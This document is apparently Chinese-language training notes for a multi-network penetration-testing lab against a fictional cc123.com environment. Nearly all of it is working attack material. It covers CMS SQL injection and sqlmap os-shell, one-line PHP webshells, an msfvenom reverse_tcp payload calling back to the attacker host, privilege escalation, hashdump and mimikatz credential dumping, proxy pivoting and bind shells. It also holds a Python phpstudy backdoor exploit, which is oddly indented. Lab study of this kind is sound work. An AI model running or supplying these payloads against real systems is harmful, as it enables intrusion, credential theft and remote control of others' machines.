项目四-内网渗透

IP 发生改变

10.10.10.134 --> 10.10.10.136

10.10.10.129 --> 10.10.1.129

一、网站漏洞

1. 信息收集

netdiscover -i eth0 -r 192.168.0.0/24  # 扫描内网主机
nmap -sn 192.168.0.0/24 

2. 端口扫描

masscan -p 1-65535 192.168.0.134 --rate=1000 # 进行端口扫描
nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 # 端口信息扫描

3. 访问网站各个端口

1. http://192.168.0.134:999/  # phpadmin
2. http://192.168.0.134:6588/ # 主机大师
3. http://192.168.0.134:80    # 网站

4. 本地设置

1. hosts 绑定
   192.168.0.134 www.cc123.com

2. 修改 kaill 网关

   vi /etc/resolv.conf  
   

5. 子域名收集

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H
"Host:FUZZ.cc123.com" --hw 53  # wfuzz 穷举子域名

www.cc123.com
ww2.cc123.com
new.cc123.com

二、漏洞测试

1. new.cc123.com

1. 织梦CMS 系统

2. 经测试发现会员系统开放 http://new.cc123.com/member

3. 查看 CMS 系统的版本

http://new.cc123.com/data/admin/ver.txt   # 20150618

4. 查找指定版本的漏洞

1. 存在注入漏洞，寻找指定版本的 exp ，进行执行
2. 经过执行后得到： 密文 812df726be884ddcfc41 解密：admin7

5. 在会员登陆界面登陆 admin 账户，上传一句话木马

6. 使用蚁剑进行连接提权 --》 提权失败

7. 利用蚁剑上传 SSPXspy 文件，并访问 密码为 admin

8. 使用 msfvenom 生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.143 lport=12345 -f exe > s.exe

9. 使用脚本检测目标服务器上可写目录，

# C://Windows/debug/WIA/
# 将s.exe 上传到目标文件夹上

10. 开启 MSF，开启监听

use exploit/multi/handler 
	set payload windows/meterpreter/reverse_tcp
	set lhost 192.168.0.143
	set lport 12345
	run

# 执行 s.exe 程序

11. 监听到会话，开始提权

# 利用反弹的会话
getuid  # 获取权限
background # 退出
use post/multi/recon/local_exploit_suggester  # 利用模块查找目标可利用漏洞
	set session 1 # 设置会话标识
	run 
# 利用查找到的模块： 
use exploit/windows/local/ms16_075_reflection_juicy
	set session 1
	run
getuid  # 查看当下权限

2. ww2.cc123.com

1. 利用工具 gobuster 扫描

# 目录扫描
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"  

扫描得到一个后台： http://ww2.cc123.com/admin 管理后台

2. 利用漏洞： 输入账号 admin’ – 即可登陆

3. 利用 sqlmap 测试注入

sqlmap -r cc123 --dbms mssql -v 1 --bat  # 测试注入
sqlmap -r cc123 --dbms mssql -v 1 --dbs  # 列出库
sqlmap -r cc123 --dbms mssql -v 1 --os-shell # 获取 mssql shel1

3. 多重网段内网渗透

前提： 获取到了 sql数据库以及 WEB 服务器权限

1. 信息收集

   1. WEB 服务器

      1. IP:

         192.168.0.134
         10.10.10.135
         

      2. 路由

         run get_local_subnets  # 查看内网 IP 段
         Local subnet: 10.10.10.0/255.255.255.0
         Local subnet: 192.168.0.0/255.255.255.0
         

      3. 哈希以及明文密码

         migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
         run hashdump # 获取 hash
         
         load mimikatz  # 载入 mimikatz
         kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
         kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords
         
         # 整理
         creds_wdigest   wdigest
         creds_tspkg   tspkg
         

2. 添加路由多重网段渗透 10.10.10.136

   run autoroute -s 10.10.10.0/24  # 添加路由
   run autoroute -p   # 查看
   
   background
   # 启动 socks 代理 
   use auxiliary/server/socks_proxy 
   	set srvport 2222
   	run
   
   # 使用 proxychains 配置文件
   vi  /etc/proxychains4.conf
   socks4 127.0.0.1 2222
   
   proxychains nmap -sT -Pn 10.10.10.136  # 使用 proxychains 调用 nmap 扫描
   

3. 多重网段渗透 数据库服务器 10.10.10.134

   1. 生成正向连接载荷
   	msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
   	use exploit/multi/handler
       set payload windows/meterpreter/bind_tcp
       set RHOST 10.10.10.134
       set  lport 13777
       run
   

4. 多重网段内网渗透获取数据库服务器哈希和明文

   migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
   run hashdump # 获取 hash
   
   load mimikatz  # 载入 mimikatz
   kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
   kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords
   
   # 整理
   creds_wdigest   wdigest
   creds_tspkg   tspkg
   
   run get_local_subnets  # 查看内网 IP 段
   run autoroute -s 10.10.1.0/24  # 添加路由
   run autoroute -p   # 查看
   background
   

5. 多重网段内网渗透第三层网络渗透目标WEB服务器

   # 启动 socks 代理 
   use auxiliary/server/socks_proxy 
   	set srvport 8888
   	run
   
   # 使用 proxychains 配置文件
   vi  /etc/proxychains4.conf
   socks4 127.0.0.1 8888
   
   proxychains nmap -sT -Pn 10.10.1.129  # 使用 proxychains 调用 nmap 扫描
   

   对于 10.10.1.129 网站进行探索发现 80 端口为 phpstudy

   1. python 编写 phpstudy exp

      #conding:utf-8
      import requests
      import re
      import sys
      import base64
          shell = "system('"+(sys.argv[1])+"');"
          shell1 = base64.b64encode(shell.encode('utf-8'))
          #shell1 =
          "ZmlsZV9wdXRfY29udGVudHMlMjglMjdtb29uJTI3JTJDJTI3JTNDJTNGcGhwJTIwZXZhbCUy
          OCUyNF9QT1NUJTVCJTIybW9vbiUyMiU1RCUyOSUzQiUzRiUzRSUyNyUyOSUzQg=="
          header={'accept-charset':shell1,'Accept-Encoding':'gzip,deflate'}
          def exploit(url):
              html=requests.get(url=url,headers=header).text
              return html
          print(exploit('http://10.10.1.129/'))
          
      # 写入 shell
      proxychains3 python3 phpstudy.py "echo ^<?php
          @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
      

   2. SocksCap代理访问目标WEB服务器

   3. metasploit正向连接目标WEB服务器

      msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
      	use exploit/multi/handler
          set payload windows/meterpreter/bind_tcp
          set RHOST 10.10.1.129
          set lport 13777
          run 
      

   4. SocksCap代理访问目标WEB服务器

   5. metasploit正向连接目标WEB服务器

      msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
      	use exploit/multi/handler
          set payload windows/meterpreter/bind_tcp
          set RHOST 10.10.1.129
          set lport 13777
          run